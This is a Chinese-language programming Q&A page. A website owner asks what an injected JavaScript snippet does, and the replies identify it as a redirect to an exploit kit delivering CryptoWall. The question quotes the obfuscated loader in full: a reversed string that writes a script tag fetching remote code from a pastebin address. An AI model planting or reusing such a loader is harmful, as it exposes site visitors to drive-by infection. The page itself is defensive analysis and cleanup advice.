【问题标题】:Javascript Malware Detected by Google ScannerGoogle 扫描仪检测到 Javascript 恶意软件
【发布时间】:2015-12-04 01:46:28
【问题描述】:

我最近在我的网站上发现了以下代码

<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>

这段代码有什么作用?我是 XSS 的受害者吗?我的托管公司有什么可以做的吗,例如恶意软件扫描程序等?

【问题讨论】:

    标签: javascript web malware


    【解决方案1】:

    这是一个指向 Exploit Kit 的重定向代码。实际的 URL 是

    pastebin[.]com/raw[.]php?i=xmGsPVWY ---> trak[masked].co.in/js
    

    请从您服务器上托管的所有页面中删除此代码。

    【讨论】:

      【解决方案2】:

      该文本被反转以形成一个 pastebin 链接 - 该 pastebin 处的脚本已加载并在浏览器中与您的站点代码的其余部分一起运行。

      【讨论】:

      • 嗨,克里斯,关于我的网站是如何被入侵的有什么建议吗?跨站脚本?反正我可以“堵住”这个洞?
      • 从这段摘录中无法判断。无论实际利用是什么,您在原始问题中发布的脚本标签都将被插入。我会通过 FTP 查找不应该存在的文件。根据网站所在的生态系统,有一些“可能的嫌疑人”可能是妥协的来源——例如,如果它是一个 wordpress 网站,我会开始在 /wp-content/uploads/ 目录中查找。对我来说,过去当我发现一个有类似 hack 的 wordpress 网站时,里面确实有一个名为 hacked.php 的文件,其中插入了类似的脚本标签。
      【解决方案3】:

      您的网站已被入侵(被黑)并被注入了该恶意 javascript 代码。

      它使用多种重定向/编码方法,但最终会将您的访问者推送到 Angler EK(漏洞利用工具包),然后尝试将 CryptoWall 集中在您的用户身上。

      您可以尝试在这里扫描:

      https://sitecheck.sucuri.net

      http://www.unmaskparasites.com/

      查找有关恶意软件的更多详细信息。

      谢谢,

      【讨论】:

        猜你喜欢
        • 1970-01-01
        • 2021-07-08
        • 2019-06-30
        • 1970-01-01
        • 2017-05-14
        • 1970-01-01
        • 2020-10-18
        • 1970-01-01
        • 1970-01-01
        相关资源
        最近更新 更多